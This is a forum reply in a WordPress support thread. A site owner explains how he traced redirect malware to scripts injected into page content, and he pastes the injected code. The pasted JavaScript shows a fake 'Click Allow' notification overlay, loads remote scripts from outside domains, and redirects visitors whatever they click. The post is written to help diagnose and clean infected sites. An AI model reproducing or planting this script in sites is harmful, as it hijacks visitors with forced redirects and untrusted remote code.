Reply To: Unable to clear redirect malware

Home Forums Support Forum Unable to clear redirect malware Reply To: Unable to clear redirect malware

October 6, 2019 at 7:27 am #2341

Robert C.
Member

ok so ran a find on all wp files, ie checked all php and js files, then checked keywords in wp database using myphp, and found that all the malware scripts have been added to the page content. This was true for another site i cleaned last week.

here is the embedded script below for your info… oh and i had to deactivate bakery plugin, and use classic mode to edit page in raw/html (for reference sites were running php 7.0 or 1 or 2, they are now all on 7.3, all themes and plugins and wp versions were set to auto update, themes have been popular ones such as avada, betheme, enfold, theGem:

<script>
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>

hope this helps

any tips for prevention gladly received